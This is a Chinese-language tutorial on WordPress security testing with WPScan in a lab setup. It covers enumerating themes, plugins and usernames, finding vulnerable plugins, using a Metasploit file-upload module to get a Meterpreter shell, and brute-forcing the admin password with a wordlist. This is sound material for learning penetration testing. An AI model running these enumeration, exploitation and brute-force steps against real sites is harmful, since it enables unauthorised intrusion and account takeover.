06.20 WPScan使用完整攻略:如何對WordPress站點進行安全測試

寫在前面的話

在這篇文章中,我將告訴大家如何使用WPScan來對WordPress站點進行安全測試。

WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它採用Ruby編寫,能夠掃描WordPress網站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的數據庫中包含超過18000種插件漏洞和2600種主題漏洞,並且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測當前已啟用的插件和其他功能。

接下來,讓我們進入正題…

工具安裝與運行

Kali Linux默認自帶了WPScan,你也可以使用下列命令在自己的設備中安裝WPScan:

git clone https://github.com/wpscanteam/wpscan.git
WPScan使用完整攻略:如何對WordPress站點進行安全測試

切換到WPScan目錄中,運行下列命令查看幫助信息:

./wpscan.rb–h
WPScan使用完整攻略:如何對WordPress站點進行安全測試

你也可以使用以下命令更新漏洞庫:

wpscan -update

掃描WordPress站點

我們可以使用–enumerate選項來掃描並發現關於目標站點主題、插件和用戶名信息。輸入下列命令開始對服務器進行掃描:

./wpscan.rb –u http://192.168.0.101/wordpress/

如果你不知道目標服務器的IP地址,你可以直接輸入URL地址。下面給出的是掃描結果:

WPScan使用完整攻略:如何對WordPress站點進行安全測試

從結果中可以看到,服務器信息為Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。我們還發現,上傳目錄開啟了目錄監聽功能,因此任何人都可以通過訪問wp-content/uploads來查看目錄中的上傳內容。

主題掃描

使用下列命令對主題進行掃描:

./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t
WPScan使用完整攻略:如何對WordPress站點進行安全測試

使用下列命令掃描主題中存在的漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt
WPScan使用完整攻略:如何對WordPress站點進行安全測試

插件掃描

插件可以擴展WordPress站點的功能,但很多插件中都存在安全漏洞,而這也會給攻擊者提供可乘之機。

我們可以使用下列命令掃描WordPress站點中安裝的插件:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p
WPScan使用完整攻略:如何對WordPress站點進行安全測試

我們可以看到該網站中安裝了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及很多其他的插件。

WPScan使用完整攻略:如何對WordPress站點進行安全測試

接下來,我們可以使用下列命令來掃描目標插件中的安全漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp
WPScan使用完整攻略:如何對WordPress站點進行安全測試

我們可以從掃描結果中看到這三款插件中存在的漏洞以及利用路徑:

WPScan使用完整攻略:如何對WordPress站點進行安全測試

結合Metasploit利用插件中的漏洞

接下來,我們將用第一個插件中的任意文件上傳漏洞來進行漏洞利用演示,該漏洞允許我們上傳惡意文件並實現遠程代碼執行。

打開終端窗口並輸入下列命令:

useexploit/unix/webapp/wp_reflexgallery_file_upload
msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msfexploit(wp_reflexgallery_file_upload) > exploit

你將看到終端與目標設備建立了Meterpreter會話,你可以輸入下列命令查看目標系統信息:

Sysinfo
WPScan使用完整攻略:如何對WordPress站點進行安全測試

枚舉WordPress用戶名

我們可以在終端中輸入下列命令來枚舉WordPress用戶名:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u
WPScan使用完整攻略:如何對WordPress站點進行安全測試

接下來工具將導出用戶名數據表,你可以看到用戶名以及對應的ID信息。

當然了,你也可以使用下列命令枚舉出所有的內容:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u
–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targeted website
WPScan使用完整攻略:如何對WordPress站點進行安全測試

使用WPScan進行暴力破解

在進行暴力破解攻擊之前,我們需要創建對應的字典文件。輸入下列命令:

./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin
WPScan使用完整攻略:如何對WordPress站點進行安全測試

如果找到了相匹配的用戶名與密碼,工具將直接以admin:password的形式顯示出來:

WPScan使用完整攻略:如何對WordPress站點進行安全測試

嚴正聲明:本文僅限於技術探討,嚴禁用於其他目的。


分享到:


相關文章: